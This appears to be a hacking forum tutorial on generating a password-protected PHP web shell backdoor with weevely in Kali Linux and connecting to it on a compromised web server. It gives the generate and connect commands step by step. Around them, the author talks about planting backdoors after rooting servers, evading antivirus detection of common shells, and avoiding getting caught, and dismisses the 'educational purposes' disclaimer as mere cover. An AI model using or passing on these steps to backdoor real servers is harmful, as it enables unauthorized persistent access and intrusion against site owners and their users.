A backdoor in a computer system is a method of bypassing normal authentication, securing unauthorized remote access to a computer, obtaining access to plaintext, and so on, while attempting to remain undetected. The backdoor may take the form of an installed program (e.g., Back Orifice) or may subvert the system through a rootkit.
That's what pretty much happens when we all get root on Web Servers. "Hell Yeah, We need Backdoors for next-time". Sometimes, we upload shells and scripts for connect backs which are awesome.
One-day i surfed to a site, got the c99 source, copied it, tried saving it and Gosh the worst happened to me: Windows and Avast won't let me save it because these shells have their sources and signatures marked up as virus on nearly every system.
The Only way one get's a secure shell on a server is only through creating your own.
Kali Linux has the functionality to generate almost every backdoor type depending on how u want it. { PHP, Android,Windows } to mention a few.
But i would be basing on weevely for this post.
These shells won't be 100% undetectable but they could atleast get us a better and safe connect back.
Weevely PHP Only
Fire Up Kali
Drop your consoles or terminals as u may prefer to call it and lets get some work-done.
Weevely
First hit weevely in your terminal to get the help interface
> weevely
Yeah that seems promising. Now to generate our back-door, Weevely allows us to password protect our shell to prevent unauthorized access.
We are generating a backdoor so we choose option 4 - Generate a PHP Backdoor.
> weevely generate skyvenom
Lets break this down
weevely generate skyvenom simples tells:
weevely to generate a php shell with a password of "skyvenom" in the current directory.
Hit ' ls ' in your terminal and you should see a weevely generated file.
> ls
Now you have your backdoor: How you get it onto a web server is not my part so please try as much as possible not to get caught otherwise, hmm: Let me be precise in betweeon 10 to 15 years in jail since hacking is now considered a great threat to the systems now.
Let's assume u got your shell on a web server, To connect to our shell we use
> weevely weburl password
>weevely http://10.0.2.2/tnb/weevely.php skyvenom
Hmm, Its really awesome to get a shell on your localhost than any other place in the world.As u can see : Have got a shell on the target in my LAN. 10.0.2.2
Ok, Guys. Have a nice day.
Note Only: For Educational Purposes,
Hmm i always see that shitty crap around: Educational Purposes : but to get my butts safe from your works: For Education Purposes.
Prompt me if i mistyped or made an error.
Jes, My waist ... Hm i wonder how OTW,ghost and others suffer their butt's up to get us a nice tut for the day. Thanks Guys and keep the work up.
#Sky
Comments
No Comments Exist
Be the first, drop a comment!